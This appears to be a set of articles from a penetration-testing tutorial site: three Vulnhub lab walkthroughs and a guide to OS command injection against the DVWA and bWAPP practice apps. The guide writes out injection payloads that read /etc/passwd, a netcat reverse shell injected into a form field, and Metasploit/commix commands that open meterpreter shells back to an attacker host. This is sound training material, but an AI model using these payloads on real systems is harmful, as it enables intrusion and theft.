CyberSploit: 1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “CyberSploit: 1”. It’s available at Vulnhub for penetration testing. This is an easy level lab. The credit for making this lab goes to cybersploit1. Let’s get started and learn how to successfully break it down. Level: Easy

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

Netdiscover
Nmap

Enumeration

Gobuster

Exploiting

Basic Cryptography
CyberChef

Privilege Escalation

Local Privilege Escalation ‘Overlays’
Capture the flag

Walkthrough

Reconnaissance

As always we identify the host’s IP with the “Netdiscover” tool:

netdiscover

1	netdiscover

So, let’s start by listing all the TCP ports with nmap.

nmap –sV -sC -p- 192.168.10.190

1	nmap –sV -sC -p- 192.168.10.190

To work more comfortably, I’ll put the IP address in /etc/hosts.

Enumeration

We access the web service and review the source code. We find the SSH user name.

It’s time to fuzzing! We used Gobuster and found several files. We examined the robots.txt and found a base64 text.

Exploiting

We use curl and add “base64 -d” to the command to decode the message in plain text. We get the first flag, the flag is the user’s password “itsskv“.

We access with the obtained credentials and read the file “flag2.txt“. Inside, we find a new code, this time it’s “binary code“.

We use the online tool “Cyberchef” and we get the second flag.

Privilege Escalation (root)

The root is quite simple (as the creator of the machine said it was easy level). The machine has a kernel vulnerable to “overlayfs: Local Privilege Escalation“. We download the exploit, compile it on the victim machine and run it. We get a root prompt and read our flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks Contacted on LinkedIn and Twitter.

Sunset: decoy Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “Sunset: decoy”. It’s available at Vulnhub for penetration testing. This is easy for the intermediate level lab. The credit for making this lab goes to whitecr0wz. Let’s start and learn how to break it down successfully.

Level: Easy/Intermediate

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

Netdiscover
Nmap

Enumeration

Web server backup

Exploiting

Zip2john & John The Ripper

Privilege Escalation

Pspy64
Crontab abuse and chkrootkit vulnerability

Capture the flag

Walkthrough

Reconnaissance

As always we identify the host’s IP with the “Netdiscover” tool:

To work more comfortably, I’ll put the IP address in /etc/hosts.

So, let’s start by listing all the TCP ports with nmap.

nmap –sV -sC -p- 192.168.10.186

1	nmap –sV -sC -p- 192.168.10.186

Enumeration

We access the web service and download the file “save.zip“.

We tried to unzip the file, but it’s password protected.

For this mission, we will use “zip2john” which will help us to extract the hash from the .zip file and later we will attack it with “John The Ripper” and the dictionary “rockyou.txt“. We will obtain the password “manual” and use it to decompress the file, this time with success.

Exploiting

In the content of the .zip, we found a backup of several system files. We read the “shadow” file, copy the two hashes into a file called “users.hash” and crack this one with John The Ripper and the “rockyou.txt” dictionary.

We connect through the SSH service, this time we will add -t “bash –noprofile” to escape from the restricted bash. In there, we will read the user flag.

Privilege Escalation (root)

We listed the files and found a binary called “honeypot.decoy“. We run it, use option 5 and see a warning that it will run in a minute.

It is time to run pspy64, we check that a binary is running as root every 60 seconds.

We looked for information about the version of this binary and found an exploit that allows to scale privileges as root.

Simply create a file called “update” and insert a reverse shell. We will give it execution permissions and wait 60 seconds with a netcat listening on port 4444 in our Kali.

After some time, we will have a session as root and we will be able to read the flag.

eLection: 1 Vulnhub Walkthorugh

Today we are going to solve another boot2root challenge called “eLection: 1”. It’s available at Vulnhub for penetration testing. This is a mid-level lab based on the CMS “eLection”. There are several methods (easy and medium) to access the server. The merit of doing this lab is Love’s. Let’s start and learn how to successfully break it down with an easy way first.

Level: Medium

Since these labs are available on the Vulnhub website. Let’s download the lab file from here.

Penetration Testing Methodology

Reconnaissance

Netdiscover
Nmap

Enumeration

Gobuster
Dirsearch
system log file

Privilege Escalation

Abuse SETUID Binary

Capture the flag

Walkthrough (Easy Way of Exploitation)

Reconnaissance

As always we identify the host’s IP with the “Netdiscover” tool:

So, let’s start by listing all the TCP ports with nmap.

nmap –sV -sC 192.168.10.181 -p-

1	nmap –sV -sC 192.168.10.181 -p-

Enumeration

We access the IP address of the web service and saw that the Apache default page is displayed.

It’s time to take out Gobuster and fuzzy directories with the “common.txt” dictionary (it comes pre-installed in Kali).

We found the directory “/phpmyadmin/” and a file robots.txt.

We access the robots.txt and find the path to a CMS voting system called “eLection“. We have found that access to this website is indeed accessible.

Exploitation (WITHOUT exploiting eLection was easier, but less fun). We use the “dirsearch” tool and merge files and directories into the path “/election/“.

Thanks to a careless system administrator, the directory “/logs/” is listed and we can obtain the SSH credentials of the user “Love“.

We use in the SSH service that the credentials of the user “Love” and read the flag of “user.txt“

Privilege Escalation (root)

We executed the following command to check the binaries we have access to. We found a rare binary, look for exploits related to it and found this exploit.

We downloaded the exploit into the victim’s machine, compile it and run it. We get root access and read the flag!

An alternative way of Exploitation (medium)

Remember, in the reconnaissance phase we found a “PhpMyAdmin” while performing the directory brute-forcing.

We try with default passwords (guessing) and support the credentials “root:toor“.

We access the “eLection” database and the “tb_panitia” table, there we find the ID and the hashed password. To get the password, we can use Google by searching for the hash.I will use my “uDork (Google Hacking Tool)“.

We visit the URL that uDork has taken from us and get the password in the plain.

We go back to the “eLection” administrator panel and use the ID “1234” and the password “[email protected]#“. We list the version of “eLection” v.2.0, so we will look for possible exploits that can be used to escalate privileges in the system.

We found the following exploit that requires the use of credentials, this exploit will allow us to execute remote code from an “os-shell” with the tool “sqlmap“.

We followed the steps of exploitation and run sqlmap.

If everything went well, we’ll get an os-shell where we can keep playing. We execute these two sequences and we will get the file “system.log” with the SSH credentials.

As we got the username and password in the easy method, so here also we will go ahead with those credentials to perform privilege escalation.

Comprehensive Guide to OS Command Injection

Isn’t it great if you get the privilege to run any system commands directly on the target’s server through its hosted web-application? Or you can get the reverse shell with some simple clicks? In this article, we’ll learn about OS Command Injection, in which an attacker is able to trigger some arbitrary system shell commands on the hosted operating system via a vulnerable web-application.

Table of Content

Introduction to Command Injection
How Command Injection Occurs?
Metacharacters
Types of Command Injection
Impact of OS Command Injection
Steps to exploit – OS Command Injection
Manual Exploitation
- Basic OS Command injection
- Bypass a Blacklist implemented
Exploitation through Automated tools
- Burp Suite
  - Manual
  - Fuzzing
- Commix
- Metasploit
Blind OS Command Injection
- Detection
- Exploitation
Mitigation – OS Command Injection

Introduction

Command Injection also referred to as Shell Injection or OS Injection. It arises when an attacker tries to perform system-level commands directly through a vulnerable application in order to retrieve information of the webserver or try to make unauthorized access into the server. Such an attack is possible only when the user-supplied data is not properly validated before passing to the server. This user data could be in any form such as forms, cookies, HTTP headers, etc.

How Command Injection Occurs?

There are many situations when the developers try to include some functionalities into their web application by making the use of the operating system commands. However, if the application passes the user-supplied input directly to the server without any validation, thus the application might become vulnerable to command injection attacks.

In order to clear the vision, let’s consider this scenario:

Think for a web-application providing functionality that any user can ping any particular IP address through his web-interface in order to confirm the host connection, which means that the application is passing the ping command with that particular input IP directly to the server.

Now if an attacker injects an unwanted system command adding up with the basic ping command using some metacharacters. Thus the web-application pass it all to the server directly for execution, allowing the attacker to gain the complete access of the operating system, start or stop a particular service, view or delete any system file and even captures a remote shell.

Metacharacters

Metacharacters are the symbolic operators which are used to separate the actual commands from the unwanted system commands. The semicolon (;) and the ampercent (&) are majorly used as separators that divides the authentic input command and the command that we are trying to inject.

The commonly used metacharacters are:

Types of Command Injection

Error based injection: When an attacker injects a command through an input parameter and the output of that command is displayed on the certain web page, it proves that the application is vulnerable to the command injection. The displayed result might be in the form of an error or the actual outcomes of the command that you tried to run. An attacker then modifies and adds additional commands depending on the shell the webserver and assembles information from the application.

Blind based Injection: The results of the commands that you inject will not be displayed to the attacker and no error messages are returned. The attacker might use another technique to identify whether the command was really executed on the server or not.

The OS Command Injection vulnerability is one of the top 10 OWASP vulnerabilities. Therefore let’s have a look onto its impact.

Impact of OS Command Injection

OS command injection is one of the most powerful vulnerability with “High Severity having a CVSS Score of 8”.

Thus this injection is reported under:

CWE-77: Improper Neutralization of Special Elements used in a Command.
CWE-78: Improper Neutralization of Special Elements used in an OS Command.

Wonder how to exploit this vulnerability? Let’s check out its steps:

Steps to exploit – OS Command Injection

Step 1: Identify the input field

Step 2: Understand the functionality

Step 3: Try the Ping method time delay

Step 4: Use various operators to exploit OS Command Injection

So I guess until now you might be having a clear vision with the concept of OS command injection and its methodology. But before making our hands wet with the attacks let’s clear one more thing i.e.

“Command Injection differs from Code Injection”, in that code injection allows the attacker to add their own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which execute system commands, without the necessity of injecting code. Source:

https://www.owasp.org/index.php/Command_Injection

Let’s Start!!

Basic OS Command injection

I’ve opened the target IP in my browser and logged in into DVWA as admin : password, from the DVWA security option I’ve set the security level to low. Now I’ve opted for the Command Injection vulnerability present on the left-hand side of the window.

I’ve been presented with a form which is suffering from OS command injection vulnerability asking to “Enter an IP address:”.

From the below image you can see that, I’ve tried to ping its localhost by typing 127.0.0.1, and therefore I got the output result.

In order to perform the “Basic OS Command Injection attack”, I’ve used the “; (semicolon)” as a metacharacter and entered another arbitary command i.e. “ls”

127.0.0.1;ls

1	127.0.0.1;ls

From the below image you can see that the “;” metacharacter did its work, and we are able to list the contents of the directory where the application actually is. Similarly we can run the other system commands such as “;pwd”, “;id” etc.

Bypass a Blacklist implemented

Many times the developers set up a blacklist of the commonly used metacharacters i.e. of “&”, “;”, ”&&”, “||”, “#” and the other ones to protect their web-applications from the command injection vulnerabilities.

Therefore in order to bypass this blacklist, we need to try all the different metacharacters that the developer forgot to add.

I’ve increased up the security level too high and tried up with all the different combinations of metacharacters.

From the above image, you can see that I’ve successfully captured the password file by using the metacharacter “|”

127.0.0.1 |cat /etc/passwd

1	127.0.0.1 \|cat /etc/passwd

Command Injection using BurpSuite

Burpsuite is considered as one of the best and the most powerful tool for web-penetration testing. So we’ll try to deface the web-application through it.

I’ve now logged in into bWAPP with bee : bug by running up the target’s IP into the browser, and have even set the security level to medium and “Choose your bug” option to “OS Command Injection”.

Let’s try to enumerate this “DNS lookup” form by clicking on the Lookup button and simply capturing the browser’s request in the proxy tab and sending the same to the Repeater.

Now I just need to manipulate the target by adding up some system commands i.e. “pwd” with the help of metacharacters.

In this I’ve used “|” as the delimiter, you can choose yours.

As soon as I click on the Go tab, the response starts generating and on the right-hand side of the window you can see that I’ve captured the working directory.

Fuzzing

In the last scenario, while bypassing the implemented blacklist, we were lucky that the developer had created and set up the list with the limited combination of metacharacters. But still, it took time, to check for every possible combination of the metacharacters. And therefore it is obvious that this metacharacter would not work with every web-application, thus in order to bypass these differently generated blacklists, we’ll be doing a fuzzing attack.

Let’s check it out how!!

I’ve created a dictionary with all the possible combinations of the metacharacters and now will simply include it into my attack.

Tune in you burp suite and start intercepting the request, as soon as you capture the ongoing request send the same to the intruder by simply doing a right-click on the proxy tab and choose the option to send to intruder.

Now we’ll set up the attack position by simply shifting the current tab to the Positions tab, and selecting the area where we want to make the attack happen with the ADD button.

Time to inject our dictionary, now move to the Payload tab and click on the load button in order to load our dictionary file.

As soon as I fire up the Start Attack button, a new window will pop up with the fuzzing attack.

From the below screenshot, it’s clear that our attack has been started and there is a fluctuation in the length section. I’ve double-clicked on the length field in order to get the highest value first.

From the below image, you can see that as soon as I clicked over the 11^th Request, I was able to detect the ls command running in the response tab.

OS Command Injection using Commix

Sometimes fuzzing consumes a lot of time, and even it becomes somewhat frustrating while performing a command injection attack over it i.e. wait for the incremented length and check for every possible response it drops.

In order to make our attack simpler and faster, we’ll be using a python scripted automated tool “Commix”, which makes it very easy to find the command injection vulnerability and then helps us to exploit it. You can learn more about Commix from here.

So let’s try to drop down the web-application again by getting a commix session in our kali machine.

From the below image you can see that I’ve set the security level too high and opted the “Choose your bug” option to “OS Command Injection”.

Commix works on cookies. Thus in order to get them, I’ll be capturing the browser’s request into my burpsuite, by simply enabling the proxy and the intercept options, further as I hit up the Lookup button, I’ll be presented with the details into the burpsuite’s Proxy tab.

Fire up you Kali Terminal with commix and run the following command with the Referer, Cookie, and target values:

commix --url="http://192.168.0.11/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=cc91040cc70b9abdb2fdc637527bf132" --data="target=www.nsa.gov&form=submit"

1	commix --url="http://192.168.0.11/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=cc91040cc70b9abdb2fdc637527bf132" --data="target=www.nsa.gov&form=submit"

Type ‘y’ to resume the classic injection point and to the pseudo-terminal shell.

Great!! We’re into our target’s machine.

What if we could convert this commix shell into a meterpreter one?

As soon as we capture the commix session, we’ll try to generate a reverse meterpreter session of the target machine by executing the following commands:

reverse_tcp
set lhost 192.168.0.9
set lport 4444

reverse_tcp

set lhost 192.168.0.9

set lport 4444

As we hit enter, it will ask us to choose whether we want a netcat shell or some other (meterpreter) one. Choose option 2 and hit enter again.

Now you’ll be popped up with a new list of sessions asking for which meterpreter session you want as in whether you want it to be PHP, Windows, python etc. As our target server is running over the PHP framework, we will select option 8 i.e. a PHP meterpreter reverse shell.

When everything is done, it will provide us with a resource file with an execution command. Open a new terminal window and type the presented command there, as in our case it generated the following command:

msfconsole -r /usr/share/commix/php_meterpreter.rc

1	msfconsole -r /usr/share/commix/php_meterpreter.rc

Cool!! It’s great to see that our commix session is now having some new wings.

OS Command Injection using Metasploit

Why drive so long in order to get a meterpreter session, if we can just gain it directly through the Metasploit framework.

Let’s check it out how

Boot the Metasploit framework into your kali terminal by running up the simple command “msfconsole”.

There are many different ways that provide us with our intended outcome, but we will use the web_delivery exploit in order to find a way to transfer our malicious payload into the remote machine.

Type the following commands to generate our payload:

use exploit/multi/script/web_delivery

1	use exploit/multi/script/web_delivery

Now it’s time to choose our target.

Type “show targets” in order to get the complete list of all the in-built target options.

set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 2222
exploit

set target 1

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.9

set lport 2222

exploit

As soon as I hit enter after typing exploit, the Metasploit framework will generate the payload with all the essentials.

We are almost done, just simply include this payload with the command using any metacharacter.

Here I’ve used & (ampercent) so that the server executes both the commands one after the another.

From the below image you can see that we are into the target’s system again, but this time we are more powerful with the Metasploit session.

Blind OS Command Injection

So until now, we were lucky enough that the web-applications were returning the outputs from the commands directly on the screen through their HTTP Responses. But there are many situations when the applications do not return anything and still run some system commands as into their backend processes. So the question arises – Do such web-applications are vulnerable to command injection??

Let’s try to figure this out by using the most reliable method the time-delay ping command which will detect whether the application is suffering from command injection or not.

Detection of Blind OS Command Injection

I’ve now logged in inside bWAPP and selected the “Choose you bug” option to “OS Command Injection – Blind”, further setting up the security level to medium.

Thus I’ve been redirected to the web application which is suffering from command injection vulnerability.

Let’s check, whether this application is actually suffering from the OS Command Injection or not.

Enter any IP address in the field provided and turn on your burpsuite monitor in order to capture the ongoing http request, thus forwarding it all into the repeater tab.

Now we’ll try to manipulate the request with

ping –c 10 192.168.0.9

1	ping –c 10 192.168.0.9

As I clicked over the Go tab, it took about 10 seconds to display the response result, thus confirms up that this web-application is suffering from OS Command Injection.

Exploiting Blind OS Command Injection using Netcat

As of now, we are confirmed that the application which we are trying to surf is suffering from command injection vulnerability. Let’s try to trigger out this web-application by generating a reverse shell using netcat.

From the below image you can see that I’ve checked my Kali machine’s IP address and set up the netcat listener at port number 2000 using

nc –lvp 2000

1	nc –lvp 2000

where l = listen, v = verbose mode and p = port.

Now on the web application, I’ve injected my netcat system command with the localhost command into the input field i.e.

localhost|nc 192.168.0.9 –e /bin/bash

The –e /bin/bash empowers the netcat command to execute a bash shell on the listener machine.

Great!! We are into the victim’s shell through our kali machine and we’re now able to run any system command from here.

Mitigation – OS Command Injection

The developers should set up some strong server-side validated codes and implement a set of whitelist commands, which only accepts the alphabets and the digits rather than the characters.

You can check this all out from the following code snippet, which can protect the web-applications from exposing to the command injection vulnerabilities.

Avoid the applications from calling out directly the OS system commands, if needed the developers can use the build-in API for interacting with the Operating System.

The developers should even ensure that the application must be running under the least privileges.

Author: Chiragh Arora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here